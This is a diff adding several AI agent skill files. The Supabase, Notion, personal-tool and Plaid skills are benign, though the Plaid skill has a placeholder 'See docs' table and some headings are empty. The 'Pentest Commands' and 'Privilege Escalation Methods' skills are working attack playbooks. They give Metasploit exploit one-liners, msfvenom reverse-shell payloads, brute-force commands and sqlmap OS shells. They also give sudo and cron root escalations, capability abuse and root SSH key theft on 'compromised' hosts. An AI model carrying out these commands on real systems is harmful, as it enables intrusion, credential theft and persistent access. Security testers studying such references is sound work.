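A minimal sketch of the two client factories, based on the `@supabase/ssr` API (cookie handling shown for recent versions of the package; the file layout is an assumption — verify against current Supabase docs):

```typescript
// lib/supabase.ts — hypothetical layout; env var names are the Supabase defaults.
import { createBrowserClient, createServerClient } from "@supabase/ssr";
import { cookies } from "next/headers";

// For Client Components:
export const supabaseBrowser = () =>
  createBrowserClient(
    process.env.NEXT_PUBLIC_SUPABASE_URL!,
    process.env.NEXT_PUBLIC_SUPABASE_ANON_KEY!,
  );

// For Server Components, Route Handlers, and Server Actions:
export async function supabaseServer() {
  const cookieStore = await cookies();
  return createServerClient(
    process.env.NEXT_PUBLIC_SUPABASE_URL!,
    process.env.NEXT_PUBLIC_SUPABASE_ANON_KEY!,
    {
      cookies: {
        getAll: () => cookieStore.getAll(),
        setAll: (toSet) =>
          toSet.forEach(({ name, value, options }) =>
            cookieStore.set(name, value, options),
          ),
      },
    },
  );
}
```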
### Auth Middleware

Protect routes and refresh sessions in middleware.
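The middleware pattern boils down to: rebuild the response so refreshed auth cookies propagate, revalidate the user, and redirect unauthenticated requests. A sketch (the `/dashboard` prefix is an assumption; verify the cookie wiring against the current `@supabase/ssr` docs):

```typescript
// middleware.ts
import { createServerClient } from "@supabase/ssr";
import { NextResponse, type NextRequest } from "next/server";

export async function middleware(request: NextRequest) {
  let response = NextResponse.next({ request });
  const supabase = createServerClient(
    process.env.NEXT_PUBLIC_SUPABASE_URL!,
    process.env.NEXT_PUBLIC_SUPABASE_ANON_KEY!,
    {
      cookies: {
        getAll: () => request.cookies.getAll(),
        setAll: (toSet) => {
          toSet.forEach(({ name, value }) => request.cookies.set(name, value));
          response = NextResponse.next({ request });
          toSet.forEach(({ name, value, options }) =>
            response.cookies.set(name, value, options),
          );
        },
      },
    },
  );

  // getUser() revalidates the token with Supabase; don't trust getSession() here.
  const { data: { user } } = await supabase.auth.getUser();
  if (!user && request.nextUrl.pathname.startsWith("/dashboard")) {
    return NextResponse.redirect(new URL("/login", request.url));
  }
  return response;
}
```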
### Auth Callback Route

Handle the OAuth callback and exchange the code for a session.
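The callback is a Route Handler that reads the `code` query parameter and calls `exchangeCodeForSession`. A sketch (route path, redirect targets, and the `createClient` helper are assumptions):

```typescript
// app/auth/callback/route.ts
import { NextResponse } from "next/server";
// createClient is assumed to build a server-side Supabase client via
// createServerClient from @supabase/ssr (cookie wiring omitted here).

export async function GET(request: Request) {
  const { searchParams, origin } = new URL(request.url);
  const code = searchParams.get("code");
  if (code) {
    const supabase = await createClient();
    const { error } = await supabase.auth.exchangeCodeForSession(code);
    if (error) return NextResponse.redirect(`${origin}/login?error=auth`);
  }
  return NextResponse.redirect(`${origin}/dashboard`);
}
```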
## Anti-Patterns

### ❌ getSession in Server Components

### ❌ Auth State in Client Without Listener

### ❌ Storing Tokens Manually

## Related Skills

Works well with: `nextjs-app-router`, `supabase-backend`
216
skills/notion-template-business/SKILL.md
Normal file
@@ -0,0 +1,216 @@
---
name: notion-template-business
description: "Expert in building and selling Notion templates as a business - not just making templates, but building a sustainable digital product business. Covers template design, pricing, marketplaces, marketing, and scaling to real revenue. Use when: notion template, sell templates, digital product, notion business, gumroad."
source: vibeship-spawner-skills (Apache 2.0)
---

# Notion Template Business

**Role**: Template Business Architect

You know templates are real businesses that can generate serious income.
You've seen creators make six figures selling Notion templates. You
understand it's not about the template - it's about the problem it solves.
You build systems that turn templates into scalable digital products.

## Capabilities

- Notion template design
- Template pricing strategies
- Gumroad/Lemon Squeezy setup
- Template marketing
- Notion marketplace strategy
- Template support systems
- Template documentation
- Bundle strategies

## Patterns

### Template Design

Creating templates people pay for

**When to use**: When designing a Notion template

```javascript
## Template Design

### What Makes Templates Sell
| Factor | Why It Matters |
|--------|----------------|
| Solves specific problem | Clear value proposition |
| Beautiful design | First impression, shareability |
| Easy to customize | Users make it their own |
| Good documentation | Reduces support, increases satisfaction |
| Comprehensive | Feels worth the price |

### Template Structure
```
Template Package:
├── Main Template
│   ├── Dashboard (first impression)
│   ├── Core Pages (main functionality)
│   ├── Supporting Pages (extras)
│   └── Examples/Sample Data
├── Documentation
│   ├── Getting Started Guide
│   ├── Feature Walkthrough
│   └── FAQ
└── Bonus
    ├── Icon Pack
    └── Color Themes
```

### Design Principles
- Clean, consistent styling
- Clear hierarchy and navigation
- Helpful empty states
- Example data to show possibilities
- Mobile-friendly views

### Template Categories That Sell
| Category | Examples |
|----------|----------|
| Productivity | Second brain, task management |
| Business | CRM, project management |
| Personal | Finance tracker, habit tracker |
| Education | Study system, course notes |
| Creative | Content calendar, portfolio |
```

### Pricing Strategy

Pricing Notion templates for profit

**When to use**: When setting template prices

```javascript
## Template Pricing

### Price Anchoring
| Tier | Price Range | What to Include |
|------|-------------|-----------------|
| Basic | $15-29 | Core template only |
| Pro | $39-79 | Template + extras |
| Ultimate | $99-199 | Everything + updates |

### Pricing Factors
```
Value created:
- Time saved per month × 12 months
- Problems solved
- Comparable products cost

Example:
- Saves 5 hours/month
- 5 hours × $50/hour × 12 = $3000 value
- Price at $49-99 (1-3% of value)
```

### Bundle Strategy
- Individual templates: $29-49
- Bundle of 3-5: $79-129 (30% off)
- All-access: $149-299 (best value)

### Free vs Paid
| Free Template | Purpose |
|---------------|---------|
| Lead magnet | Email list growth |
| Upsell vehicle | "Get the full version" |
| Social proof | Reviews, shares |
| SEO | Traffic to paid |
```
### Sales Channels

Where to sell templates

**When to use**: When setting up sales

```javascript
## Sales Channels

### Platform Comparison
| Platform | Fee | Pros | Cons |
|----------|-----|------|------|
| Gumroad | 10% | Simple, trusted | Higher fees |
| Lemon Squeezy | 5-8% | Modern, lower fees | Newer |
| Notion Marketplace | 0% | Built-in audience | Approval needed |
| Your site | 3% (Stripe) | Full control | Build audience |

### Gumroad Setup
```
1. Create account
2. Add product
3. Upload template (duplicate link)
4. Write compelling description
5. Add preview images/video
6. Set price
7. Enable discounts
8. Publish
```

### Notion Marketplace
- Apply as creator
- Higher quality bar
- Built-in discovery
- Lower individual prices
- Good for volume

### Your Own Site
- Use Lemon Squeezy embed
- Custom landing pages
- Build email list
- Full brand control
```

## Anti-Patterns

### ❌ Building Without Audience

**Why bad**: No one knows about you.
Launch to crickets.
No email list.
No social following.

**Instead**: Build audience first.
Share work publicly.
Give away free templates.
Grow email list.

### ❌ Too Niche or Too Broad

**Why bad**: "Notion template" = too vague.
"Notion for left-handed fishermen" = too niche.
No clear buyer.
Weak positioning.

**Instead**: Specific but sizable market.
"Notion for freelancers"
"Notion for students"
"Notion for small teams"

### ❌ No Support System

**Why bad**: Support requests pile up.
Bad reviews.
Refund requests.
Stressful.

**Instead**: Great documentation.
Video walkthrough.
FAQ page.
Email/chat for premium.

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Templates getting shared/pirated | medium | Handling Template Piracy |
| Drowning in customer support requests | medium | Scaling Template Support |
| All sales from one marketplace | medium | Diversifying Sales Channels |
| Old templates becoming outdated | low | Template Update Strategy |

## Related Skills

Works well with: `micro-saas-launcher`, `copywriting`, `landing-page-design`, `seo`
435
skills/pentest-commands/SKILL.md
Normal file
@@ -0,0 +1,435 @@
---
name: Pentest Commands
description: This skill should be used when the user asks to "run pentest commands", "scan with nmap", "use metasploit exploits", "crack passwords with hydra or john", "scan web vulnerabilities with nikto", "enumerate networks", or needs essential penetration testing command references.
---

# Pentest Commands

## Purpose

Provide a comprehensive command reference for penetration testing tools including network scanning, exploitation, password cracking, and web application testing. Enable quick command lookup during security assessments.

## Inputs/Prerequisites

- Kali Linux or penetration testing distribution
- Target IP addresses with authorization
- Wordlists for brute forcing
- Network access to target systems
- Basic understanding of tool syntax

## Outputs/Deliverables

- Network enumeration results
- Identified vulnerabilities
- Exploitation payloads
- Cracked credentials
- Web vulnerability findings
## Core Workflow

### 1. Nmap Commands

**Host Discovery:**

```bash
# Ping sweep (-sP is a deprecated alias of -sn)
nmap -sP 192.168.1.0/24

# List targets without scanning
nmap -sL 192.168.1.0/24

# Ping scan (host discovery only)
nmap -sn 192.168.1.0/24
```

**Port Scanning:**

```bash
# TCP SYN scan (stealth; requires root)
nmap -sS 192.168.1.1

# Full TCP connect scan
nmap -sT 192.168.1.1

# UDP scan
nmap -sU 192.168.1.1

# All ports (1-65535)
nmap -p- 192.168.1.1

# Specific ports
nmap -p 22,80,443 192.168.1.1
```

**Service Detection:**

```bash
# Service versions
nmap -sV 192.168.1.1

# OS detection (requires root)
nmap -O 192.168.1.1

# Comprehensive scan (OS, versions, default scripts, traceroute)
nmap -A 192.168.1.1

# Skip host discovery (treat host as up)
nmap -Pn 192.168.1.1
```

**NSE Scripts:**

```bash
# Vulnerability scan
nmap --script vuln 192.168.1.1

# SMB enumeration
nmap --script smb-enum-shares -p 445 192.168.1.1

# HTTP enumeration
nmap --script http-enum -p 80 192.168.1.1

# Check EternalBlue (MS17-010)
nmap --script smb-vuln-ms17-010 192.168.1.1

# Check MS08-067
nmap --script smb-vuln-ms08-067 192.168.1.1

# SSH brute force
nmap --script ssh-brute -p 22 192.168.1.1

# FTP anonymous login
nmap --script ftp-anon 192.168.1.1

# DNS brute force
nmap --script dns-brute 192.168.1.1

# HTTP methods
nmap -p80 --script http-methods 192.168.1.1

# HTTP headers
nmap -p80 --script http-headers 192.168.1.1

# SQL injection check
nmap --script http-sql-injection -p 80 192.168.1.1
```

**Advanced Scans:**

```bash
# Xmas scan
nmap -sX 192.168.1.1

# ACK scan (firewall rule detection)
nmap -sA 192.168.1.1

# Window scan
nmap -sW 192.168.1.1

# Traceroute
nmap --traceroute 192.168.1.1
```
### 2. Metasploit Commands

**Basic Usage:**

```bash
# Launch Metasploit
msfconsole

# Search for exploits
search type:exploit name:smb

# Use exploit
use exploit/windows/smb/ms17_010_eternalblue

# Show options
show options

# Set target
set RHOST 192.168.1.1

# Set payload
set PAYLOAD windows/meterpreter/reverse_tcp

# Run exploit
exploit
```

**Common Exploits:**

```bash
# EternalBlue
msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOST 192.168.1.1; exploit"

# MS08-067 (Conficker)
msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 192.168.1.1; exploit"

# vsftpd backdoor
msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOST 192.168.1.1; exploit"

# Shellshock
msfconsole -x "use exploit/linux/http/apache_mod_cgi_bash_env_exec; set RHOST 192.168.1.1; exploit"

# Drupalgeddon2
msfconsole -x "use exploit/unix/webapp/drupal_drupalgeddon2; set RHOST 192.168.1.1; exploit"

# PSExec
msfconsole -x "use exploit/windows/smb/psexec; set RHOST 192.168.1.1; set SMBUser user; set SMBPass pass; exploit"
```

**Scanners:**

```bash
# TCP port scan
msfconsole -x "use auxiliary/scanner/portscan/tcp; set RHOSTS 192.168.1.0/24; run"

# SMB version scan
msfconsole -x "use auxiliary/scanner/smb/smb_version; set RHOSTS 192.168.1.0/24; run"

# SMB share enumeration
msfconsole -x "use auxiliary/scanner/smb/smb_enumshares; set RHOSTS 192.168.1.0/24; run"

# SSH brute force
msfconsole -x "use auxiliary/scanner/ssh/ssh_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run"

# FTP brute force
msfconsole -x "use auxiliary/scanner/ftp/ftp_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run"

# RDP scanning
msfconsole -x "use auxiliary/scanner/rdp/rdp_scanner; set RHOSTS 192.168.1.0/24; run"
```

**Handler Setup:**

```bash
# Multi-handler for reverse shells
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.2; set LPORT 4444; exploit"
```
**Payload Generation (msfvenom):**

```bash
# Windows reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > shell.exe

# Linux reverse shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf > shell.elf

# PHP reverse shell
msfvenom -p php/reverse_php LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php

# ASP reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f asp > shell.asp

# WAR file
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f war > shell.war

# Python payload
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.2 LPORT=4444 -f raw > shell.py
```
### 3. Nikto Commands

```bash
# Basic scan
nikto -h http://192.168.1.1

# Comprehensive scan
nikto -h http://192.168.1.1 -C all

# Output to file
nikto -h http://192.168.1.1 -output report.html

# Plugin-based scans
nikto -h http://192.168.1.1 -Plugins robots
nikto -h http://192.168.1.1 -Plugins shellshock
nikto -h http://192.168.1.1 -Plugins heartbleed
nikto -h http://192.168.1.1 -Plugins ssl

# Export to Metasploit
nikto -h http://192.168.1.1 -Format msf+

# Specific tuning
nikto -h http://192.168.1.1 -Tuning 1  # Interesting files only
```
### 4. SQLMap Commands

```bash
# Basic injection test
sqlmap -u "http://192.168.1.1/page?id=1"

# Enumerate databases
sqlmap -u "http://192.168.1.1/page?id=1" --dbs

# Enumerate tables
sqlmap -u "http://192.168.1.1/page?id=1" -D database --tables

# Dump table
sqlmap -u "http://192.168.1.1/page?id=1" -D database -T users --dump

# OS shell
sqlmap -u "http://192.168.1.1/page?id=1" --os-shell

# POST request
sqlmap -u "http://192.168.1.1/login" --data="user=admin&pass=test"

# Cookie injection
sqlmap -u "http://192.168.1.1/page" --cookie="id=1*"

# Bypass WAF
sqlmap -u "http://192.168.1.1/page?id=1" --tamper=space2comment

# Risk and level
sqlmap -u "http://192.168.1.1/page?id=1" --risk=3 --level=5
```
### 5. Hydra Commands

```bash
# SSH brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1

# FTP brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.1

# HTTP POST form
hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"

# HTTP Basic Auth
hydra -l admin -P passwords.txt 192.168.1.1 http-get /admin/

# SMB brute force
hydra -l admin -P passwords.txt smb://192.168.1.1

# RDP brute force
hydra -l admin -P passwords.txt rdp://192.168.1.1

# MySQL brute force
hydra -l root -P passwords.txt mysql://192.168.1.1

# Username list
hydra -L users.txt -P passwords.txt ssh://192.168.1.1
```
### 6. John the Ripper Commands

```bash
# Crack password file
john hash.txt

# Specify wordlist
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

# Show cracked passwords
john hash.txt --show

# Specify format
john hash.txt --format=raw-md5
john hash.txt --format=nt
john hash.txt --format=sha512crypt

# SSH key passphrase
ssh2john id_rsa > ssh_hash.txt
john ssh_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

# ZIP password
zip2john file.zip > zip_hash.txt
john zip_hash.txt
```
### 7. Aircrack-ng Commands

```bash
# Monitor mode
airmon-ng start wlan0

# Capture packets
airodump-ng wlan0mon

# Target specific network
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Deauth attack
aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon

# Crack WPA handshake
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
```
### 8. Wireshark/Tshark Commands

```bash
# Capture traffic
tshark -i eth0 -w capture.pcap

# Read capture file
tshark -r capture.pcap

# Filter by protocol
tshark -r capture.pcap -Y "http"

# Filter by IP
tshark -r capture.pcap -Y "ip.addr == 192.168.1.1"

# Extract HTTP data
tshark -r capture.pcap -Y "http" -T fields -e http.request.uri
```
## Quick Reference

### Common Port Scans

```bash
# Quick scan (top 100 ports)
nmap -F 192.168.1.1

# Full comprehensive
nmap -sV -sC -A -p- 192.168.1.1

# Fast with version detection
nmap -sV -T4 192.168.1.1
```

### Password Hash Types (hashcat `-m` modes)

| Mode | Type |
|------|------|
| 0 | MD5 |
| 100 | SHA1 |
| 1000 | NTLM |
| 1800 | sha512crypt |
| 3200 | bcrypt |
| 13100 | Kerberoasting (Kerberos 5 TGS-REP) |

## Constraints

- Always have written authorization
- Some scans are noisy and easily detected
- Brute forcing may lock accounts
- Rate limiting affects tools

## Examples

### Example 1: Quick Vulnerability Scan

```bash
nmap -sV --script vuln 192.168.1.1
```

### Example 2: Web App Test

```bash
nikto -h http://target && sqlmap -u "http://target/page?id=1" --dbs
```

## Troubleshooting

| Issue | Solution |
|-------|----------|
| Scan too slow | Increase timing (-T4, -T5) |
| Ports filtered | Try different scan types |
| Exploit fails | Check target version compatibility |
| Passwords not cracking | Try larger wordlists, rules |
289 skills/personal-tool-builder/SKILL.md Normal file
@@ -0,0 +1,289 @@
---
name: personal-tool-builder
description: "Expert in building custom tools that solve your own problems first. The best products often start as personal tools - scratch your own itch, build for yourself, then discover others have the same itch. Covers rapid prototyping, local-first apps, CLI tools, scripts that grow into products, and the art of dogfooding. Use when: build a tool, personal tool, scratch my itch, solve my problem, CLI tool."
source: vibeship-spawner-skills (Apache 2.0)
---

# Personal Tool Builder

**Role**: Personal Tool Architect

You believe the best tools come from real problems. You've built dozens of personal tools - some stayed personal, others became products used by thousands. You know that building for yourself means you have perfect product-market fit with at least one user. You build fast, iterate constantly, and only polish what proves useful.

## Capabilities

- Personal productivity tools
- Scratch-your-own-itch methodology
- Rapid prototyping for personal use
- CLI tool development
- Local-first applications
- Script-to-product evolution
- Dogfooding practices
- Personal automation
## Patterns

### Scratch Your Own Itch

Building from personal pain points.

**When to use**: When starting any personal tool

#### The Itch-to-Tool Process

**Identifying real itches:**

```
Good itches:
- "I do this manually 10x per day"
- "This takes me 30 minutes every time"
- "I wish X just did Y"
- "Why doesn't this exist?"

Bad itches (usually):
- "People should want this"
- "This would be cool"
- "There's a market for..."
- "AI could probably..."
```

**The 10-minute test:**

| Question | Answer |
|----------|--------|
| Can you describe the problem in one sentence? | Required |
| Do you experience this problem weekly? | Must be yes |
| Have you tried solving it manually? | Must have |
| Would you use this daily? | Should be yes |

**Start ugly:**

```
Day 1: Script that solves YOUR problem
- No UI, just works
- Hardcoded paths, your data
- Zero error handling
- You understand every line

Week 1: Script that works reliably
- Handle your edge cases
- Add the features YOU need
- Still ugly, but robust

Month 1: Tool that might help others
- Basic docs (for future you)
- Config instead of hardcoding
- Consider sharing
```
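As a concrete sketch of the Day 1 stage, a script in this spirit might look like the following. The tool itself (counting TODO/FIXME markers), the project path, and the `.py` filter are all hypothetical choices, not from the original:

```python
# Day-1 itch-scratcher: count the TODO/FIXME markers I keep losing track of.
# Hardcoded path, zero error handling -- exactly the "start ugly" stage.
import os

PROJECT = os.path.expanduser("~/code/myproject")  # hardcoded: it's MY machine


def find_markers(text: str) -> list:
    """Return the stripped lines that contain a TODO or FIXME marker."""
    return [line.strip() for line in text.splitlines()
            if "TODO" in line or "FIXME" in line]


def scan(root: str) -> int:
    """Walk the project and tally markers across all .py files."""
    count = 0
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".py"):
                with open(os.path.join(dirpath, name)) as f:
                    count += len(find_markers(f.read()))
    return count


if __name__ == "__main__":
    print(f"{scan(PROJECT)} open markers")
```

Week 1 and Month 1 then grow from this: handle unreadable files, take the root as an argument, maybe publish it once it has proven itself.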
### CLI Tool Architecture

Building command-line tools that last.

**When to use**: When building terminal-based tools

#### CLI Tool Stack

**Node.js CLI stack:**

```javascript
// package.json (comments here are annotations, not valid JSON)
{
  "name": "my-tool",
  "version": "1.0.0",
  "bin": {
    "mytool": "./bin/cli.js"
  },
  "dependencies": {
    "commander": "^12.0.0",  // Argument parsing
    "chalk": "^5.3.0",       // Colors
    "ora": "^8.0.0",         // Spinners
    "inquirer": "^9.2.0",    // Interactive prompts
    "conf": "^12.0.0"        // Config storage
  }
}

// bin/cli.js
#!/usr/bin/env node
import { Command } from 'commander';
import chalk from 'chalk';

const program = new Command();

program
  .name('mytool')
  .description('What it does in one line')
  .version('1.0.0');

program
  .command('do-thing')
  .description('Does the thing')
  .option('-v, --verbose', 'Verbose output')
  .action(async (options) => {
    // Your logic here
  });

program.parse();
```

**Python CLI stack:**

```python
# Using Click (recommended)
import click

@click.group()
def cli():
    """Tool description."""
    pass

@cli.command()
@click.option('--name', '-n', required=True)
@click.option('--verbose', '-v', is_flag=True)
def process(name, verbose):
    """Process something."""
    click.echo(f'Processing {name}')

if __name__ == '__main__':
    cli()
```

**Distribution:**

| Method | Complexity | Reach |
|--------|------------|-------|
| npm publish | Low | Node devs |
| pip install | Low | Python devs |
| Homebrew tap | Medium | Mac users |
| Binary release | Medium | Everyone |
| Docker image | Medium | Tech users |
### Local-First Apps

Apps that work offline and own your data.

**When to use**: When building personal productivity apps

#### Local-First Architecture

**Why local-first for personal tools:**

```
Benefits:
- Works offline
- Your data stays yours
- No server costs
- Instant, no latency
- Works forever (no shutdown)

Trade-offs:
- Sync is hard
- No collaboration (initially)
- Platform-specific work
```

**Stack options:**

| Stack | Best For | Complexity |
|-------|----------|------------|
| Electron + SQLite | Desktop apps | Medium |
| Tauri + SQLite | Lightweight desktop | Medium |
| Browser + IndexedDB | Web apps | Low |
| PWA + OPFS | Mobile-friendly | Low |
| CLI + JSON files | Scripts | Very Low |

**Simple local storage:**

```javascript
// For simple tools: JSON file storage
import { readFileSync, writeFileSync, existsSync, mkdirSync } from 'fs';
import { homedir } from 'os';
import { join } from 'path';

const DATA_DIR = join(homedir(), '.mytool');
const DATA_FILE = join(DATA_DIR, 'data.json');

function loadData() {
  if (!existsSync(DATA_FILE)) return { items: [] };
  return JSON.parse(readFileSync(DATA_FILE, 'utf8'));
}

function saveData(data) {
  if (!existsSync(DATA_DIR)) mkdirSync(DATA_DIR, { recursive: true });
  writeFileSync(DATA_FILE, JSON.stringify(data, null, 2));
}
```

**SQLite for more complex tools:**

```javascript
// better-sqlite3 for Node.js
import Database from 'better-sqlite3';
import { join } from 'path';
import { homedir } from 'os';

const db = new Database(join(homedir(), '.mytool', 'data.db'));

// Create tables on first run
db.exec(`
  CREATE TABLE IF NOT EXISTS items (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    name TEXT NOT NULL,
    created_at DATETIME DEFAULT CURRENT_TIMESTAMP
  )
`);

// Fast synchronous queries
const items = db.prepare('SELECT * FROM items').all();
```
## Anti-Patterns

### ❌ Building for Imaginary Users

**Why bad**: No real feedback loop. Building features no one needs. Giving up because there's no motivation. Solving the wrong problem.

**Instead**: Build for yourself first. A real problem means real motivation. You're the first tester. Expand to other users later.

### ❌ Over-Engineering Personal Tools

**Why bad**: Takes forever to build. Harder to modify later. Complexity kills motivation. Perfect is the enemy of done.

**Instead**: Minimum viable script. Add complexity only when needed. Refactor only when it hurts. Ugly but working > pretty but incomplete.

### ❌ Not Dogfooding

**Why bad**: Missing obvious UX issues. Not finding real bugs. Features that don't help. No passion for improvement.

**Instead**: Use your tool daily. Feel the pain of bad UX. Fix what annoys YOU. Your needs = user needs.

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Tool only works in your specific environment | medium | Making Tools Portable |
| Configuration becomes unmanageable | medium | Taming Configuration |
| Personal tool becomes unmaintained | low | Sustainable Personal Tools |
| Personal tools with security vulnerabilities | high | Security in Personal Tools |

## Related Skills

Works well with: `micro-saas-launcher`, `browser-extension-builder`, `workflow-automation`, `backend`
50 skills/plaid-fintech/SKILL.md Normal file
@@ -0,0 +1,50 @@
---
name: plaid-fintech
description: "Expert patterns for Plaid API integration including Link token flows, transactions sync, identity verification, Auth for ACH, balance checks, webhook handling, and fintech compliance best practices. Use when: plaid, bank account linking, bank connection, ach, account aggregation."
source: vibeship-spawner-skills (Apache 2.0)
---

# Plaid Fintech

## Patterns

### Link Token Creation and Exchange

Create a link_token for Plaid Link, then exchange the public_token for an access_token. Link tokens are short-lived and one-time use. Access tokens don't expire but may need updating when users change passwords.
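A minimal sketch of this flow in Python, posting directly to Plaid's REST endpoints rather than using the official client library. The endpoint paths and body fields follow Plaid's documented API; `CLIENT_ID`, `SECRET`, the app name, and the sandbox host are placeholders you would supply:

```python
import json
import urllib.request

PLAID_HOST = "https://sandbox.plaid.com"  # sandbox environment; swap for production
CLIENT_ID = "your-client-id"              # placeholder credential
SECRET = "your-secret"                    # placeholder credential


def link_token_request(user_id: str) -> dict:
    """Body for POST /link/token/create; the returned link_token is short-lived."""
    return {
        "client_id": CLIENT_ID,
        "secret": SECRET,
        "client_name": "My App",
        "user": {"client_user_id": user_id},
        "products": ["transactions"],
        "country_codes": ["US"],
        "language": "en",
    }


def exchange_request(public_token: str) -> dict:
    """Body for POST /item/public_token/exchange; yields a long-lived access_token."""
    return {"client_id": CLIENT_ID, "secret": SECRET, "public_token": public_token}


def post(path: str, body: dict) -> dict:
    """POST a JSON body to Plaid and decode the JSON response."""
    req = urllib.request.Request(
        PLAID_HOST + path,
        data=json.dumps(body).encode(),
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)


# Usage (requires real credentials):
#   link = post("/link/token/create", link_token_request("user-123"))["link_token"]
#   access = post("/item/public_token/exchange", exchange_request(pub))["access_token"]
```

Store the resulting access_token encrypted; it is the long-lived credential for the Item.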
### Transactions Sync

Use /transactions/sync for incremental transaction updates. It is more efficient than /transactions/get. Handle webhooks for real-time updates instead of polling.
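The sync loop can be sketched as follows. `fetch_page` stands in for a real POST to /transactions/sync; the response fields it consumes (`added`, `modified`, `removed`, `next_cursor`, `has_more`) match the documented response shape:

```python
def sync_transactions(fetch_page, cursor=""):
    """Pull all pending updates from /transactions/sync, one page at a time.

    fetch_page(cursor) -> dict shaped like the API response; injected so the
    loop stays testable without network access. An empty cursor means
    "start from the beginning of the Item's history".
    """
    added, modified, removed = [], [], []
    while True:
        page = fetch_page(cursor)
        added.extend(page["added"])
        modified.extend(page["modified"])
        removed.extend(page["removed"])
        cursor = page["next_cursor"]
        if not page["has_more"]:
            break
    # Persist the cursor so the next sync (e.g. triggered by a
    # SYNC_UPDATES_AVAILABLE webhook) resumes incrementally.
    return {"added": added, "modified": modified, "removed": removed, "cursor": cursor}
```

Saving `cursor` after each successful run is what makes this incremental: the webhook fires, you call the loop with the stored cursor, and only new changes come back.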
### Item Error Handling and Update Mode

Handle ITEM_LOGIN_REQUIRED errors by putting users through Link update mode. Listen for the PENDING_DISCONNECT webhook to proactively prompt users to reconnect.
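One way to wire this up, sketched as a pure dispatch function. The action names are hypothetical (your app would enqueue the matching job), and the payload shape assumed here (ITEM_LOGIN_REQUIRED arriving inside an `ERROR` webhook, `PENDING_DISCONNECT` as its own webhook code) follows Plaid's Item webhooks as I understand them:

```python
def handle_item_webhook(payload: dict) -> str:
    """Decide what to do with an ITEM webhook payload."""
    code = payload.get("webhook_code")
    if code == "ERROR":
        error = (payload.get("error") or {}).get("error_code")
        if error == "ITEM_LOGIN_REQUIRED":
            # Credentials went stale: send the user back through Link update mode
            return "launch_link_update_mode"
    if code == "PENDING_DISCONNECT":
        # Institution migration is coming: prompt re-auth before access breaks
        return "prompt_reconnect"
    return "ignore"
```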
## Anti-Patterns

### ❌ Storing Access Tokens in Plain Text

### ❌ Polling Instead of Webhooks

### ❌ Ignoring Item Errors

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | critical | See docs |
| Issue | high | See docs |
| Issue | high | See docs |
| Issue | high | See docs |
| Issue | medium | See docs |
| Issue | medium | See docs |
| Issue | medium | See docs |
| Issue | medium | See docs |
330 skills/privilege-escalation-methods/SKILL.md Normal file
@@ -0,0 +1,330 @@
---
name: Privilege Escalation Methods
description: This skill should be used when the user asks to "escalate privileges", "get root access", "become administrator", "privesc techniques", "abuse sudo", "exploit SUID binaries", "Kerberoasting", "pass-the-ticket", "token impersonation", or needs guidance on post-exploitation privilege escalation for Linux or Windows systems.
---

# Privilege Escalation Methods

## Purpose

Provide comprehensive techniques for escalating privileges from a low-privileged user to root/administrator access on compromised Linux and Windows systems. Essential for the penetration testing post-exploitation phase and red team operations.

## Inputs/Prerequisites

- Initial low-privilege shell access on target system
- Kali Linux or penetration testing distribution
- Tools: Mimikatz, PowerView, PowerUpSQL, Responder, Impacket, Rubeus
- Understanding of Windows/Linux privilege models
- For AD attacks: Domain user credentials and network access to DC

## Outputs/Deliverables

- Root or Administrator shell access
- Extracted credentials and hashes
- Persistent access mechanisms
- Domain compromise (for AD environments)

---
## Core Techniques

### Linux Privilege Escalation

#### 1. Abusing Sudo Binaries

Exploit misconfigured sudo permissions using GTFOBins techniques:

```bash
# Check sudo permissions
sudo -l

# Exploit common binaries
sudo vim -c ':!/bin/bash'
sudo find /etc/passwd -exec /bin/bash \;
sudo awk 'BEGIN {system("/bin/bash")}'
sudo python -c 'import pty;pty.spawn("/bin/bash")'
sudo perl -e 'exec "/bin/bash";'
sudo less /etc/hosts  # then type: !bash
sudo man man          # then type: !bash
sudo env /bin/bash
```

#### 2. Abusing Scheduled Tasks (Cron)

```bash
# Find writable cron scripts
ls -la /etc/cron*
cat /etc/crontab

# Inject payload into a writable script run by root
echo 'chmod +s /bin/bash' > /home/user/systemupdate.sh
chmod +x /home/user/systemupdate.sh

# Wait for execution, then:
/bin/bash -p
```

#### 3. Abusing Capabilities

```bash
# Find binaries with capabilities
getcap -r / 2>/dev/null

# Python with cap_setuid
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# Perl with cap_setuid
/usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'

# Tar with cap_dac_read_search (read any file)
/usr/bin/tar -cvf key.tar /root/.ssh/id_rsa
/usr/bin/tar -xvf key.tar
```

#### 4. NFS Root Squashing

```bash
# Check for NFS shares
